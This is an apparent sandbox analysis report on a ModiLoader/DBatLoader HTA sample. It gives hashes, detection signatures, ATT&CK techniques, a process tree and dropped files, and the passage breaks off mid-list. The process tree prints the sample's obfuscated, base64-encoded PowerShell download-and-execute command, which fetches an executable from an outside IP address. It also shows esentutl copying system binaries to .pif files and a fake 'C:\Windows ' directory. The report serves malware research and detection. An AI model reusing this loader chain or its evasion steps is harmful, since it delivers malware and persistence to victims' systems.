modiloader | 87f8242b695b7dd667f9e270c070c195016a3512367f960ecce95154c7fc08e4

Analysis

max time kernel
97s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 12:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

creatednew.hta
Size

154KB
MD5

e6ea1b0e973fa8ec748b9579629894b4
SHA1

1dd21e28ff3a7ff940ce09b4c02913851a33353c
SHA256

87f8242b695b7dd667f9e270c070c195016a3512367f960ecce95154c7fc08e4
SHA512

7f644f0c2ef4fdfac5685f6a1cad2ada9fc48bc0ea42b5387a5d904e1c932c9438c3740ae0518907c278456ef172d8d65c8c5a133576d4bcaa333fe93e368def
SSDEEP

96:4owZw9d6yfaCqsjL2ZAV6PTgLUkMXHsqDo3qsjL2ZAV6P8gLUkMXHsqDo8mYMnSB:4LwASgFM4t+ywYQ

Score

10^/10

modiloader defense_evasion discovery execution persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral2/memory/1028-79-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-92-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-83-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-84-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-93-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-107-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-141-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-140-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-138-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-136-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-134-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-132-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-131-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-130-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-128-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-127-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-126-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-124-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-123-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-121-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-120-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-118-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-116-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-115-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-114-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-105-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-143-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-142-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-139-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-137-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-135-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-133-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-100-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-129-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-89-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-99-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-98-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-125-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-122-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-119-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-117-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-94-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-113-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-112-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-110-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-111-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-109-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-106-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-91-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-104-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-90-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-103-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-102-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-88-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-101-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-87-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-97-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-96-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-86-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-95-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/1028-85-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2

Blocklisted process makes network request 1 IoCs

flow	pid	Process
13	2428	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1396	cmd.exe
2428	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 8 IoCs

pid	Process
1028	winnit.exe
2996	alpha.pif
540	alpha.pif
2236	alpha.pif
3788	xpha.pif
1752	alpha.pif
1508	alpha.pif
2624	alpha.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gmqkzdbd = "C:\\Users\\Public\\Gmqkzdbd.url"	winnit.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2908	100	WerFault.exe	111

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winnit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	colorcpl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1456	esentutl.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2428	powershell.exe
2428	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2428	powershell.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 4200 wrote to memory of 1396	4200	mshta.exe	84
PID 4200 wrote to memory of 1396	4200	mshta.exe	84
PID 4200 wrote to memory of 1396	4200	mshta.exe	84
PID 1396 wrote to memory of 2428	1396	cmd.exe	86
PID 1396 wrote to memory of 2428	1396	cmd.exe	86
PID 1396 wrote to memory of 2428	1396	cmd.exe	86
PID 2428 wrote to memory of 4120	2428	powershell.exe	87
PID 2428 wrote to memory of 4120	2428	powershell.exe	87
PID 2428 wrote to memory of 4120	2428	powershell.exe	87
PID 4120 wrote to memory of 4608	4120	csc.exe	88
PID 4120 wrote to memory of 4608	4120	csc.exe	88
PID 4120 wrote to memory of 4608	4120	csc.exe	88
PID 2428 wrote to memory of 1028	2428	powershell.exe	93
PID 2428 wrote to memory of 1028	2428	powershell.exe	93
PID 2428 wrote to memory of 1028	2428	powershell.exe	93
PID 1028 wrote to memory of 316	1028	winnit.exe	99
PID 1028 wrote to memory of 316	1028	winnit.exe	99
PID 1028 wrote to memory of 316	1028	winnit.exe	99
PID 316 wrote to memory of 2656	316	cmd.exe	101
PID 316 wrote to memory of 2656	316	cmd.exe	101
PID 316 wrote to memory of 2656	316	cmd.exe	101
PID 316 wrote to memory of 1456	316	cmd.exe	102
PID 316 wrote to memory of 1456	316	cmd.exe	102
PID 316 wrote to memory of 1456	316	cmd.exe	102
PID 316 wrote to memory of 2996	316	cmd.exe	103
PID 316 wrote to memory of 2996	316	cmd.exe	103
PID 316 wrote to memory of 2996	316	cmd.exe	103
PID 316 wrote to memory of 540	316	cmd.exe	104
PID 316 wrote to memory of 540	316	cmd.exe	104
PID 316 wrote to memory of 540	316	cmd.exe	104
PID 316 wrote to memory of 2236	316	cmd.exe	105
PID 316 wrote to memory of 2236	316	cmd.exe	105
PID 316 wrote to memory of 2236	316	cmd.exe	105
PID 2236 wrote to memory of 3788	2236	alpha.pif	106
PID 2236 wrote to memory of 3788	2236	alpha.pif	106
PID 2236 wrote to memory of 3788	2236	alpha.pif	106
PID 316 wrote to memory of 1752	316	cmd.exe	107
PID 316 wrote to memory of 1752	316	cmd.exe	107
PID 316 wrote to memory of 1752	316	cmd.exe	107
PID 316 wrote to memory of 1508	316	cmd.exe	108
PID 316 wrote to memory of 1508	316	cmd.exe	108
PID 316 wrote to memory of 1508	316	cmd.exe	108
PID 316 wrote to memory of 2624	316	cmd.exe	109
PID 316 wrote to memory of 2624	316	cmd.exe	109
PID 316 wrote to memory of 2624	316	cmd.exe	109
PID 1028 wrote to memory of 928	1028	winnit.exe	110
PID 1028 wrote to memory of 928	1028	winnit.exe	110
PID 1028 wrote to memory of 928	1028	winnit.exe	110
PID 1028 wrote to memory of 100	1028	winnit.exe	111
PID 1028 wrote to memory of 100	1028	winnit.exe	111
PID 1028 wrote to memory of 100	1028	winnit.exe	111
PID 1028 wrote to memory of 100	1028	winnit.exe	111

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatednew.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4200
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOWErshell.EXe -ex BYPasS -nop -W 1 -c DeViCeCReDENtIaLDEPLOymenT.exe ; INVOke-eXpRESSIOn($(InVOke-eXPResSiON('[SYsTem.tExT.eNCODing]'+[chAR]58+[CHaR]0X3A+'uTf8.GetSTRINg([sYSTEm.CONvErT]'+[chAr]0x3a+[ChAR]58+'FroMBAsE64STRiNg('+[cHAR]34+'JHogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVyZEVmaW5pdElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJaUxmb3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMaVRDb253SFl4bSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlQUk8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS011LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURGVW1qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9MZ0tOTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaSUdPdU9Fa0F6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIxNi4xNTguMjM4LjYxLzEyNi93aW5uaXQuZXhlIiwiJEVOVjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U1RBUnQtc2xlRXAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[ChAr]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWErshell.EXe -ex BYPasS -nop -W 1 -c DeViCeCReDENtIaLDEPLOymenT.exe ; INVOke-eXpRESSIOn($(InVOke-eXPResSiON('[SYsTem.tExT.eNCODing]'+[chAR]58+[CHaR]0X3A+'uTf8.GetSTRINg([sYSTEm.CONvErT]'+[chAr]0x3a+[ChAR]58+'FroMBAsE64STRiNg('+[cHAR]34+'JHogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVyZEVmaW5pdElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJaUxmb3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMaVRDb253SFl4bSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlQUk8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS011LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURGVW1qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9MZ0tOTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaSUdPdU9Fa0F6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIxNi4xNTguMjM4LjYxLzEyNi93aW5uaXQuZXhlIiwiJEVOVjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U1RBUnQtc2xlRXAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[ChAr]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\igcy2xeg\igcy2xeg.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4120
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA0F3.tmp" "c:\Users\Admin\AppData\Local\Temp\igcy2xeg\CSCEFA69DEAEFE404C84DCD677B7FD8BB6.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4608
  - - C:\Users\Admin\AppData\Roaming\winnit.exe
      "C:\Users\Admin\AppData\Roaming\winnit.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1028
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dbdzkqmG.cmd" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:316
      - C:\Windows\SysWOW64\esentutl.exe
        
        C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
        6⤵
        
        PID:2656
      - C:\Windows\SysWOW64\esentutl.exe
        
        C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1456
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2996
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:540
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2236
        
        C:\Users\Public\xpha.pif
        
        C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3788
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1752
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1508
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2624
    - - C:\Windows\SysWOW64\esentutl.exe
        
        C:\\Windows\\System32\\esentutl.exe /y C:\Users\Admin\AppData\Roaming\winnit.exe /d C:\\Users\\Public\\Libraries\\Gmqkzdbd.PIF /o
        5⤵
        
        PID:928
    - - C:\Windows\SysWOW64\colorcpl.exe
        
        C:\Windows\System32\colorcpl.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:100
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 556
        6⤵
        Program crash
        
        PID:2908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 100 -ip 100
1⤵
PID:2532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA0F3.tmp

Filesize
1KB

MD5
5befe56f789d8f350a3fdc917c620363

SHA1
e0c64cfc1fb6159243a6535c87f60de7c3672c7d

SHA256
dfac01c66ae7754c15331fa245486c1eb0676957b34f062946e1766a4c4632bf

SHA512
36379ef7e092b10e88f228359a6b9f79c64750d40b925aca3fa415a976b8d32b77e589775dfdaec828a09c9539ac52e66404031b3b15d2abe88a20d8378aacda

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cinbf0cn.zuc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\igcy2xeg\igcy2xeg.dll

Filesize
3KB

MD5
931e1f116dc72d022f49fb41aa138a5e

SHA1
2cc52207a563e724608ede7c63fd3559a48ae7c0

SHA256
113d5a40ad9005eafb77a7ae547539fa0ddece33ff642b3c0964c8c4d4464ac3

SHA512
38e903c100276e233c112eb1c8cc69df0029e2355492bc3c0d32649da6b32bab4af96c6fa29d1f33f328c334019b1935f583fdde1db4612ccc7b57e564e9ca7e

Download Submit
C:\Users\Admin\AppData\Roaming\winnit.exe

Filesize
1.1MB

MD5
cad69031c8878d1b06315be343d99ccf

SHA1
f050a162fc3bed8152d05212c8d02088c972d4d4

SHA256
86596162c86fdb54936df369e7f5da21967f4e4a37a3798dc6ec390f1d78aee0

SHA512
01fe3d0d27750d1939eec22924504ab06008666f350570e1a8855a17a2bdf2af81d802b2648688a1a986bf9a1d0eb763a6663605a8f5aeb1cf890b501acd2fc1

Download Submit
C:\Users\Public\Libraries\dbdzkqmG.cmd

Filesize
60KB

MD5
b87f096cbc25570329e2bb59fee57580

SHA1
d281d1bf37b4fb46f90973afc65eece3908532b2

SHA256
d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e

SHA512
72901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7

Download Submit
C:\Users\Public\alpha.pif

Filesize
231KB

MD5
d0fce3afa6aa1d58ce9fa336cc2b675b

SHA1
4048488de6ba4bfef9edf103755519f1f762668f

SHA256
4d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22

SHA512
80e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2

Download Submit
C:\Users\Public\xpha.pif

Filesize
18KB

MD5
b3624dd758ccecf93a1226cef252ca12

SHA1
fcf4dad8c4ad101504b1bf47cbbddbac36b558a7

SHA256
4aaa74f294c15aeb37ada8185d0dead58bd87276a01a814abc0c4b40545bf2ef

SHA512
c613d18511b00fa25fc7b1bdde10d96debb42a99b5aaab9e9826538d0e229085bb371f0197f6b1086c4f9c605f01e71287ffc5442f701a95d67c232a5f031838

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\igcy2xeg\CSCEFA69DEAEFE404C84DCD677B7FD8BB6.TMP

Filesize
652B

MD5
497180dd5c91ade0433c3f8f04fcf176

SHA1
e58d3a39818789a4e8a68f61b3651a5de74188e6

SHA256
fb60b4bda9c52e3e486b078067ab3d52da99372f97870e683c6e2a436b71ecc4

SHA512
b2b1376c3ec6ef5847505a210c17c53f9501723eac55926eeb511c31d53eaa67eeb5bf011bb6de4abde9f1e9f3bb40779e928e30a091fa3035f4275b3fe823b2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\igcy2xeg\igcy2xeg.0.cs

Filesize
474B

MD5
17ed2a09ef8af2f424fe41d48e4977bf

SHA1
73415d4f005b620f31b555b33a4cf32bc4af19f4

SHA256
aa39fbaff125462aabb3e5b4b9e940c3e600fd6a40098fe9d1ad4c7351b19978

SHA512
c58d339d2edd5bd65b18402fdf76b17c7c23628d2f462d11d0cb52fa873ab1f04b9ac6e8bc08dad2df70c3a0b45326f1bcadc47e97e60c52e24de11166a7ed1f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\igcy2xeg\igcy2xeg.cmdline

Filesize
369B

MD5
464b0dc894e4f11d55016e7c91741c18

SHA1
570b25a812bda14b29ce3b7ba472281a66930f82

SHA256
ace805254c11523f3ea61f1d204620da5cf2ec1576f3a889d721add342e4efb3

SHA512
00984471c4aff4ce16095f04681429d151278b05f698abbee9df8c80656ce9a1c14c7d72cbd8a13e0b7c34ed5ce2e8f087a0be2e93a82adf8b7cc63bf874b391

Download Submit
memory/1028-99-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/1028-79-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/1028-85-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/1028-95-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/1028-86-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/1028-96-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/1028-97-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/1028-87-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
